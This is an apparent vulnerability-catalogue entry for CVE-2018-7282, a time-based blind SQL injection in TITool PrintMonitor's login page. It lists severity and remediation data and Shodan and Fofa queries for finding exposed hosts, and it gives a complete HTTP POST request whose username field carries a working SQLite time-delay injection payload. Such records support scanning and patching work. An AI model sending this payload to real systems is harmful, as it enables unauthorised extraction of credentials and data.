| Title | TITool PrintMonitor - Blind SQL Injection |
|---|---|
| Author | theamanrawat |
| Severity | Critical |
| Impact | Unauthenticated attackers can execute time-based blind SQL injection to extract database contents, potentially compromising user credentials and sensitive printing data. |
| Remediation | Upgrade to PM18.2.1. |
| CVSS Score | 9.8 |
| EPSS Score | 0.6882 |
| CVE ID | CVE-2018-7282 |
| CWE ID | CWE-89 |
| Shodan Query | title:"PrintMonitor"http.title:"printmonitor" |
| Fofa Query | title="printmonitor" |
| Tags | time-based-sqli cve2018 cve sqli printmonitor unauth titool vkev vuln |
The username parameter of the TITool PrintMonitor solution during the login request is vulnerable to and/or time-based blind SQLi.
POST /login.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
Connection: close
Content-Length: 113
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=IzuCXY')+OR+4191=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(50000000/2))))--+vDwl&password=NrNndcwP&language=en
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-7282.yaml
🦈 Packet Capture: ⬇️ Download cve-2018-7282.pcap
N/AN/A